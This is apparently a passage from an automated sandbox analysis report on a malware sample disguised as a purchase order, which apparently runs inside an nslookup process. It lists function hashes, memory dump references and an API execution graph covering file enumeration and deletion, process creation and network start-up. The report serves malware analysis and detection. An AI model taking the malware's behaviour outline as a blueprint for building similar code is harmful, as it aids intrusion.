                                  • Opcode Fuzzy Hash: 90bbbb7de2311a09704e816c7331a9c63e93419ed1733c429d70564173a3fc4b
                                  • Instruction Fuzzy Hash: 1EE15372E0020AABDF15CFA4CC81BEEBBB9BF44355F14856AE515EB280D770A985CB50
                                  Function 0160EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23448838ed2cf9444ed6ed77747fefb56488559608b1d520a6d100e3a981bcd5
                                  • Instruction ID: f97a60cbd7d80cd17c747048999c57ec2532b335df103e43e2a3ea28e696e7fc
                                  • Opcode Fuzzy Hash: 23448838ed2cf9444ed6ed77747fefb56488559608b1d520a6d100e3a981bcd5
                                  • Instruction Fuzzy Hash: FDE1F270D00608DFCB2ACFA9C984A9EBBF1FF48315F1445AAE956A73A1D771A841CF50
                                  Function 0165EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 094e297a5d79b46ac4d500576b9a821143aa7cc456ec5dceceb63bef2db8de63
                                  • Instruction ID: b0de1a69e5dff4c918f34d8b587778fd7d65a817e1247a611598175cda7d7e17
                                  • Opcode Fuzzy Hash: 094e297a5d79b46ac4d500576b9a821143aa7cc456ec5dceceb63bef2db8de63
                                  • Instruction Fuzzy Hash: 24716671E012199FDF91CFA8CD84ADDBBB5BF48315F0840AAE905EB350D734A905CBA4
                                  Function 016BA4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 83d21a2693000a5b4046d034f575bc50462a1931b047cf507cecc823bd0ee05e
                                  • Instruction ID: fcbc246f532b2b1a9b8ae59144493965da0452bd977e94c7d4d918e84ae534c4
                                  • Opcode Fuzzy Hash: 83d21a2693000a5b4046d034f575bc50462a1931b047cf507cecc823bd0ee05e
                                  • Instruction Fuzzy Hash: 5E515A767016229FDB28CE98CCE4AA9B7F1FB89314B14416DDA06CB711DB74ED91CB80
                                  Function 0165F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: c4d7a5c32caf0f88bbdf4fd4812d07c888012ca4d7f5f6c60e363937e123d80d
                                  • Instruction ID: 8120f0c4963e498d03aebbf591274f192c42312893f492e0a5a99e88e41d546f
                                  • Opcode Fuzzy Hash: c4d7a5c32caf0f88bbdf4fd4812d07c888012ca4d7f5f6c60e363937e123d80d
                                  • Instruction Fuzzy Hash: 815133B2E012199FEF48CF99DC84ADDBBB1BF48355F1880AAE905AB250D7349901CF94
                                  Function 01617B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                  • String ID:
                                  • API String ID: 4281723722-0
                                  • Opcode ID: ef18badb8d720ad94d0d7298fcc80b6609248fbc19025349047bf61d733a9146
                                  • Instruction ID: 9719e165488a6a9fcaa28635ed07c78378bbcd0b9291337901f0e77cfd5348b1
                                  • Opcode Fuzzy Hash: ef18badb8d720ad94d0d7298fcc80b6609248fbc19025349047bf61d733a9146
                                  • Instruction Fuzzy Hash: E2312572E01229AFCF65DFA8EC84A9DBBF1BB48720F10416AE911B7394DB305940CF54
                                  Function 015E59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 150ee5c3e63e2bcb43cd267ae5675ab9ad7f0104802fa8051ee08dd4f89d8a95
                                  • Instruction ID: ea30baad83805cca84b095ec33144adde5b2e863ff3fd5e3e81ea6e310bdcdae
                                  • Opcode Fuzzy Hash: 150ee5c3e63e2bcb43cd267ae5675ab9ad7f0104802fa8051ee08dd4f89d8a95
                                  • Instruction Fuzzy Hash: 1E325B74D1026ADFDB29CF64C848BEDBBF0BB18308F0085E9D559AB241E7759A84CF91
                                  Function 01627D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 9591bdc3fd59376ccaabae84d226e5aeb8890c306417d7c80c4526755bed63db
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: 5291D271E04A3A9BEB24CF6DCC81EBEBBA5AF64320F14451AE955A73C0D7349941CF21
                                  Function 01614C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0$Flst
                                  • API String ID: 0-758220159
                                  • Opcode ID: 76b6e1bb5252bc58f86d0dec63b733b784413ba3619ca746a4cbf9171e4593d4
                                  • Instruction ID: ac15735f88d0e341445941f9e595df075614d1fc9eb92bd6d2b03f123ab2b893
                                  • Opcode Fuzzy Hash: 76b6e1bb5252bc58f86d0dec63b733b784413ba3619ca746a4cbf9171e4593d4
                                  • Instruction Fuzzy Hash: 80519CB2E002158BCF26CF99DC84669FBF4FF44758F59802ED4099B355EB709985CB80
                                  Function 0166CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0166CFBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: @$@4Cw@4Cw
                                  • API String ID: 4062629308-3101775584
                                  • Opcode ID: 546017c3789685b8860d2a26a3e5afef0f7f8ab98e776ee60b10573ca6b39e65
                                  • Instruction ID: d2412a02ca1abe63d3aeaf2b7f3fda4ba33a1310ef701a7c667a90e58fc584a5
                                  • Opcode Fuzzy Hash: 546017c3789685b8860d2a26a3e5afef0f7f8ab98e776ee60b10573ca6b39e65
                                  • Instruction Fuzzy Hash: EB418EB1E0061ADFDB219FA9CD40AAABBB8FF94700F00402EEA45DB354D774D801CB65
                                  Function 015DDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0$0
                                  • API String ID: 3446177414-203156872
                                  • Opcode ID: a89b3a65c8d75e3eb6bf23f11269577abf98a97d390feb5f71d9ad838356c8b7
                                  • Instruction ID: 6211ac86131617544089d027f2c14909511204c50bfb1bc5f4c8fa079af9f290
                                  • Opcode Fuzzy Hash: a89b3a65c8d75e3eb6bf23f11269577abf98a97d390feb5f71d9ad838356c8b7
                                  • Instruction Fuzzy Hash: CB415BB1A087069FD321CF2CC884A1ABBE5FB89314F04496EF588DB341D771E905CB96

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:1.7%
                                  Total number of Nodes:417
                                  Total number of Limit Nodes:67
                                  execution_graph 96079 2a65620 96084 2a67a10 96079->96084 96081 2a65650 96083 2a6567c 96081->96083 96088 2a67990 96081->96088 96085 2a67a23 96084->96085 96095 2a77480 96085->96095 96087 2a67a4e 96087->96081 96089 2a679d4 96088->96089 96090 2a679f5 96089->96090 96101 2a77280 96089->96101 96090->96081 96092 2a679e5 96093 2a67a01 96092->96093 96106 2a77f00 96092->96106 96093->96081 96096 2a774f6 96095->96096 96098 2a774a7 96095->96098 96100 31f2dd0 LdrInitializeThunk 96096->96100 96097 2a7751b 96097->96087 96098->96087 96100->96097 96102 2a772f2 96101->96102 96104 2a772a4 96101->96104 96109 31f4650 LdrInitializeThunk 96102->96109 96103 2a77317 96103->96092 96104->96092 96107 2a77f1d 96106->96107 96108 2a77f2e NtClose 96107->96108 96108->96090 96109->96103 96110 2a70ce0 96111 2a70cfc 96110->96111 96112 2a70d24 96111->96112 96113 2a70d38 96111->96113 96114 2a77f00 NtClose 96112->96114 96115 2a77f00 NtClose 96113->96115 96116 2a70d2d 96114->96116 96117 2a70d41 96115->96117 96120 2a79ea0 RtlAllocateHeap 96117->96120 96119 2a70d4c 96120->96119 96121 2a77e60 96122 2a77ecf 96121->96122 96123 2a77e87 96121->96123 96124 2a77ee5 NtDeleteFile 96122->96124 96125 2a680ee 96126 2a680f3 96125->96126 96128 2a68081 96126->96128 96129 2a66b50 LdrInitializeThunk LdrInitializeThunk 96126->96129 96129->96128 96130 31f2ad0 LdrInitializeThunk 96131 2a62675 96134 2a65e80 96131->96134 96133 2a6268a 96136 2a65eb3 96134->96136 96135 2a65ed4 96135->96133 96136->96135 96141 2a77a70 96136->96141 96138 2a77f00 NtClose 96140 2a65f77 96138->96140 96139 2a65ef7 96139->96135 96139->96138 96140->96133 96142 2a77a8a 96141->96142 96145 31f2ca0 LdrInitializeThunk 96142->96145 96143 2a77ab6 96143->96139 96145->96143 96146 2a597f0 96147 2a59c37 96146->96147 96149 2a5a09a 96147->96149 96150 2a79a20 96147->96150 96151 2a79a46 96150->96151 96156 2a54080 96151->96156 96153 2a79a52 96154 2a79a80 96153->96154 96159 2a74510 96153->96159 96154->96149 96163 2a630d0 96156->96163 96158 2a5408d 96158->96153 96160 2a7456a 96159->96160 96162 2a74577 96160->96162 96187 2a615b0 96160->96187 96162->96154 96164 2a630e4 96163->96164 96166 2a630fd 96164->96166 96167 2a78920 96164->96167 96166->96158 96169 2a78938 96167->96169 96168 2a7895c 96168->96166 96169->96168 96174 2a77580 96169->96174 96175 2a7759a 96174->96175 96181 31f2c0a 96175->96181 96176 2a775c6 96178 2a79d80 96176->96178 96184 2a78260 96178->96184 96180 2a789c1 96180->96166 96182 31f2c1f LdrInitializeThunk 96181->96182 96183 31f2c11 96181->96183 96182->96176 96183->96176 96185 2a7827a 96184->96185 96186 2a7828b RtlFreeHeap 96185->96186 96186->96180 96188 2a615eb 96187->96188 96205 2a677a0 96188->96205 96190 2a615f3 96203 2a618a9 96190->96203 96216 2a79e60 96190->96216 96192 2a61609 96193 2a79e60 RtlAllocateHeap 96192->96193 96194 2a6161a 96193->96194 96195 2a79e60 RtlAllocateHeap 96194->96195 96197 2a61628 96195->96197 96204 2a616b2 96197->96204 96228 2a665e0 NtClose LdrInitializeThunk LdrInitializeThunk 96197->96228 96199 2a6186f 96200 2a61895 WSAStartup 96199->96200 96201 2a618a3 96199->96201 96200->96201 96224 2a76c30 96201->96224 96203->96162 96219 2a64390 96204->96219 96206 2a677cc 96205->96206 96229 2a67690 96206->96229 96209 2a67811 96211 2a6782d 96209->96211 96214 2a77f00 NtClose 96209->96214 96210 2a677f9 96212 2a67804 96210->96212 96213 2a77f00 NtClose 96210->96213 96211->96190 96212->96190 96213->96212 96215 2a67823 96214->96215 96215->96190 96240 2a78210 96216->96240 96218 2a79e7b 96218->96192 96221 2a643b4 96219->96221 96220 2a643bb 96220->96199 96221->96220 96222 2a64407 96221->96222 96223 2a643f0 LdrLoadDll 96221->96223 96222->96199 96223->96222 96225 2a76c8a 96224->96225 96227 2a76c97 96225->96227 96243 2a618c0 96225->96243 96227->96203 96228->96204 96230 2a676aa 96229->96230 96234 2a67786 96229->96234 96235 2a77620 96230->96235 96233 2a77f00 NtClose 96233->96234 96234->96209 96234->96210 96236 2a7763a 96235->96236 96239 31f35c0 LdrInitializeThunk 96236->96239 96237 2a6777a 96237->96233 96239->96237 96241 2a7822d 96240->96241 96242 2a7823e RtlAllocateHeap 96241->96242 96242->96218 96247 2a618e0 96243->96247 96257 2a67a70 96243->96257 96246 2a61ae1 96266 2a7af90 96246->96266 96252 2a61dc2 96247->96252 96261 2a7ae60 96247->96261 96249 2a67a10 LdrInitializeThunk 96250 2a61b21 96249->96250 96250->96249 96250->96252 96254 2a60570 LdrInitializeThunk 96250->96254 96251 2a61af6 96251->96250 96272 2a60570 96251->96272 96252->96227 96254->96250 96255 2a67a10 LdrInitializeThunk 96256 2a61c4f 96255->96256 96256->96250 96256->96255 96258 2a67a7d 96257->96258 96259 2a67aa5 96258->96259 96260 2a67a9e SetErrorMode 96258->96260 96259->96247 96260->96259 96262 2a7ae76 96261->96262 96263 2a7ae70 96261->96263 96264 2a79e60 RtlAllocateHeap 96262->96264 96263->96246 96265 2a7ae9c 96264->96265 96265->96246 96267 2a7af00 96266->96267 96268 2a7af5d 96267->96268 96269 2a79e60 RtlAllocateHeap 96267->96269 96268->96251 96270 2a7af3a 96269->96270 96271 2a79d80 RtlFreeHeap 96270->96271 96271->96268 96273 2a60583 96272->96273 96276 2a78180 96273->96276 96277 2a7819d 96276->96277 96280 31f2c70 LdrInitializeThunk 96277->96280 96278 2a6058f 96278->96256 96280->96278 96281 2a694f0 96282 2a694f7 96281->96282 96282->96281 96283 2a69518 96282->96283 96284 2a79d80 RtlFreeHeap 96282->96284 96284->96283 96285 2a656b0 96286 2a77580 LdrInitializeThunk 96285->96286 96287 2a656e6 96286->96287 96288 2a6f6f0 96289 2a6f70d 96288->96289 96290 2a64390 LdrLoadDll 96289->96290 96291 2a6f72b 96290->96291 96292 2a70871 96304 2a77d70 96292->96304 96294 2a70892 96295 2a708c5 96294->96295 96296 2a708b0 96294->96296 96298 2a77f00 NtClose 96295->96298 96297 2a77f00 NtClose 96296->96297 96299 2a708b9 96297->96299 96301 2a708ce 96298->96301 96300 2a708fa 96301->96300 96302 2a79d80 RtlFreeHeap 96301->96302 96303 2a708ee 96302->96303 96305 2a77e0c 96304->96305 96307 2a77d94 96304->96307 96306 2a77e22 NtReadFile 96305->96306 96306->96294 96307->96294 96308 2a6a5b0 96313 2a6a2e0 96308->96313 96310 2a6a5bd 96325 2a69f80 96310->96325 96312 2a6a5d3 96314 2a6a305 96313->96314 96315 2a6a442 96314->96315 96335 2a72340 96314->96335 96315->96310 96317 2a6a459 96317->96310 96318 2a6a450 96318->96317 96320 2a6a541 96318->96320 96346 2a699e0 96318->96346 96322 2a6a599 96320->96322 96355 2a69d40 96320->96355 96323 2a79d80 RtlFreeHeap 96322->96323 96324 2a6a5a0 96323->96324 96324->96310 96326 2a69f96 96325->96326 96332 2a69fa1 96325->96332 96327 2a79e60 RtlAllocateHeap 96326->96327 96327->96332 96328 2a69fb7 96328->96312 96329 2a6a2ae 96330 2a6a2c7 96329->96330 96331 2a79d80 RtlFreeHeap 96329->96331 96330->96312 96331->96330 96332->96328 96332->96329 96333 2a699e0 RtlFreeHeap 96332->96333 96334 2a69d40 RtlFreeHeap 96332->96334 96333->96332 96334->96332 96336 2a7234e 96335->96336 96337 2a72355 96335->96337 96336->96318 96338 2a64390 LdrLoadDll 96337->96338 96339 2a7238a 96338->96339 96340 2a72399 96339->96340 96359 2a71e10 LdrLoadDll 96339->96359 96342 2a79e60 RtlAllocateHeap 96340->96342 96343 2a72531 96340->96343 96345 2a723b2 96342->96345 96343->96318 96344 2a79d80 RtlFreeHeap 96344->96343 96345->96343 96345->96344 96347 2a69a06 96346->96347 96360 2a6d200 96347->96360 96349 2a69a6d 96351 2a69bf0 96349->96351 96352 2a69a8b 96349->96352 96350 2a69bd5 96350->96318 96351->96350 96353 2a698a0 RtlFreeHeap 96351->96353 96352->96350 96365 2a698a0 96352->96365 96353->96351 96356 2a69d49 96355->96356 96357 2a6d200 RtlFreeHeap 96356->96357 96358 2a69de2 96357->96358 96358->96320 96359->96340 96362 2a6d216 96360->96362 96361 2a6d220 96361->96349 96362->96361 96363 2a79d80 RtlFreeHeap 96362->96363 96364 2a6d259 96363->96364 96364->96349 96366 2a698b6 96365->96366 96369 2a6d270 96366->96369 96368 2a699bc 96368->96352 96371 2a6d294 96369->96371 96370 2a6d32c 96370->96368 96371->96368 96371->96370 96372 2a79d80 RtlFreeHeap 96371->96372 96372->96370 96373 2a609f0 96374 2a60a0a 96373->96374 96375 2a64390 LdrLoadDll 96374->96375 96376 2a60a28 96375->96376 96377 2a60a5c PostThreadMessageW 96376->96377 96378 2a60a6d 96376->96378 96377->96378 96379 2a6bd30 96380 2a6bd59 96379->96380 96381 2a6be5d 96380->96381 96382 2a6be03 FindFirstFileW 96380->96382 96382->96381 96383 2a6be1e 96382->96383 96384 2a6be4d FindNextFileW 96383->96384 96384->96383 96385 2a6be56 FindClose 96384->96385 96385->96381 96387 2a66930 96388 2a6695a 96387->96388 96391 2a67840 96388->96391 96390 2a66981 96392 2a6785d 96391->96392 96398 2a77670 96392->96398 96394 2a678ad 96395 2a678b4 96394->96395 96403 2a77750 96394->96403 96395->96390 96397 2a678dd 96397->96390 96399 2a77703 96398->96399 96400 2a77697 96398->96400 96408 31f2f30 LdrInitializeThunk 96399->96408 96400->96394 96401 2a7773c 96401->96394 96404 2a777f5 96403->96404 96405 2a77777 96403->96405 96409 31f2d10 LdrInitializeThunk 96404->96409 96405->96397 96406 2a7783a 96406->96397 96408->96401 96409->96406 96410 2a71070 96415 2a7107f 96410->96415 96411 2a71109 96412 2a710c3 96413 2a79d80 RtlFreeHeap 96412->96413 96414 2a710d3 96413->96414 96415->96411 96415->96412 96416 2a71104 96415->96416 96417 2a79d80 RtlFreeHeap 96416->96417 96417->96411 96418 2a77530 96419 2a7754d 96418->96419 96422 31f2df0 LdrInitializeThunk 96419->96422 96420 2a77575 96422->96420 96423 2a67c82 GetFileAttributesW 96424 2a67c93 96423->96424 96425 2a66ec0 96426 2a66ed8 96425->96426 96428 2a66f32 96425->96428 96426->96428 96429 2a6aaa0 96426->96429 96430 2a6aac6 96429->96430 96431 2a6acdf 96430->96431 96458 2a782f0 96430->96458 96431->96428 96433 2a6ab3c 96433->96431 96434 2a7af90 2 API calls 96433->96434 96435 2a6ab58 96434->96435 96435->96431 96436 2a6ac26 96435->96436 96438 2a77580 LdrInitializeThunk 96435->96438 96437 2a6ac42 96436->96437 96439 2a655a0 LdrInitializeThunk 96436->96439 96464 2a74630 96437->96464 96440 2a6abb4 96438->96440 96439->96437 96440->96436 96446 2a6abbd 96440->96446 96442 2a6ac0e 96444 2a67a10 LdrInitializeThunk 96442->96444 96443 2a6ac64 96457 2a6acc7 96443->96457 96469 2a77140 96443->96469 96449 2a6ac1c 96444->96449 96445 2a6abec 96484 2a73710 LdrInitializeThunk 96445->96484 96446->96431 96446->96442 96446->96445 96461 2a655a0 96446->96461 96449->96428 96450 2a67a10 LdrInitializeThunk 96453 2a6acd5 96450->96453 96452 2a6ac9e 96474 2a771e0 96452->96474 96453->96428 96455 2a6acb8 96479 2a77320 96455->96479 96457->96450 96459 2a7830d 96458->96459 96460 2a7831e CreateProcessInternalW 96459->96460 96460->96433 96462 2a77750 LdrInitializeThunk 96461->96462 96463 2a655de 96462->96463 96463->96445 96465 2a7468d 96464->96465 96466 2a746c8 96465->96466 96485 2a65380 96465->96485 96466->96443 96468 2a746aa 96468->96443 96470 2a771b5 96469->96470 96471 2a77167 96469->96471 96489 31f39b0 LdrInitializeThunk 96470->96489 96471->96452 96472 2a771da 96472->96452 96475 2a77252 96474->96475 96477 2a77204 96474->96477 96490 31f4340 LdrInitializeThunk 96475->96490 96476 2a77277 96476->96455 96477->96455 96480 2a77392 96479->96480 96482 2a77344 96479->96482 96491 31f2fb0 LdrInitializeThunk 96480->96491 96481 2a773b7 96481->96457 96482->96457 96484->96442 96486 2a65320 96485->96486 96487 2a65337 96486->96487 96488 2a67a10 LdrInitializeThunk 96486->96488 96487->96468 96488->96486 96489->96472 96490->96476 96491->96481 96492 2a66d00 96493 2a66d1c 96492->96493 96496 2a66d6f 96492->96496 96494 2a77f00 NtClose 96493->96494 96493->96496 96497 2a66d37 96494->96497 96495 2a66e8f 96496->96495 96503 2a66110 NtClose LdrInitializeThunk 96496->96503 96502 2a66110 NtClose LdrInitializeThunk 96497->96502 96499 2a66e6f 96499->96495 96504 2a662e0 NtClose LdrInitializeThunk LdrInitializeThunk 96499->96504 96502->96496 96503->96499 96504->96495 96510 2a773c0 96511 2a77444 96510->96511 96513 2a773e4 96510->96513 96515 31f2ee0 LdrInitializeThunk 96511->96515 96512 2a77475 96515->96512 96516 2a59790 96517 2a5979f 96516->96517 96518 2a597e0 96517->96518 96519 2a597cd CreateThread 96517->96519 96520 2a6ee10 96521 2a6ee74 96520->96521 96522 2a65e80 2 API calls 96521->96522 96524 2a6ef9d 96522->96524 96523 2a6efa4 96524->96523 96545 2a65f90 96524->96545 96526 2a6f143 96527 2a6f020 96527->96526 96528 2a6f152 96527->96528 96549 2a6ebf0 96527->96549 96529 2a77f00 NtClose 96528->96529 96531 2a6f15c 96529->96531 96532 2a6f055 96532->96528 96533 2a6f060 96532->96533 96534 2a79e60 RtlAllocateHeap 96533->96534 96535 2a6f089 96534->96535 96536 2a6f092 96535->96536 96537 2a6f0a8 96535->96537 96538 2a77f00 NtClose 96536->96538 96558 2a6eae0 CoInitialize 96537->96558 96540 2a6f09c 96538->96540 96541 2a77f00 NtClose 96543 2a6f13c 96541->96543 96542 2a6f0b6 96542->96541 96544 2a79d80 RtlFreeHeap 96543->96544 96544->96526 96546 2a65fb5 96545->96546 96560 2a77880 96546->96560 96550 2a6ec0c 96549->96550 96551 2a64390 LdrLoadDll 96550->96551 96553 2a6ec2a 96551->96553 96552 2a6ec33 96552->96532 96553->96552 96554 2a64390 LdrLoadDll 96553->96554 96555 2a6ecfe 96554->96555 96556 2a64390 LdrLoadDll 96555->96556 96557 2a6ed58 96555->96557 96556->96557 96557->96532 96559 2a6eb45 96558->96559 96559->96542 96561 2a7789d 96560->96561 96564 31f2c60 LdrInitializeThunk 96561->96564 96562 2a66029 96562->96527 96564->96562 96565 2a74ed0 96566 2a74f2a 96565->96566 96568 2a74f37 96566->96568 96569 2a72a60 96566->96569 96571 2a72aa1 96569->96571 96570 2a72ba6 96570->96568 96571->96570 96572 2a64390 LdrLoadDll 96571->96572 96574 2a72ae7 96572->96574 96573 2a72b20 Sleep 96573->96574 96574->96570 96574->96573 96575 2a77c10 96576 2a77cbf 96575->96576 96577 2a77c3b 96575->96577 96578 2a77cd5 NtCreateFile 96576->96578 96584 2a62fdc 96585 2a67690 2 API calls 96584->96585 96587 2a62fec 96585->96587 96586 2a63001 96587->96586 96588 2a77f00 NtClose 96587->96588 96588->96586

                                  Executed Functions

                                  Function 02A6BD30 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A6BE14
                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02A6BE4F
                                  • FindClose.KERNELBASE(?), ref: 02A6BE5A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 60e6a619f792cef91ebf149339725841f93ac0b32b861d3016797f44164373a4
                                  • Instruction ID: d5e8ea49a5c197fc0c41a5f9a2df2725c3a727d8ad4bdc70faca75922bde60be
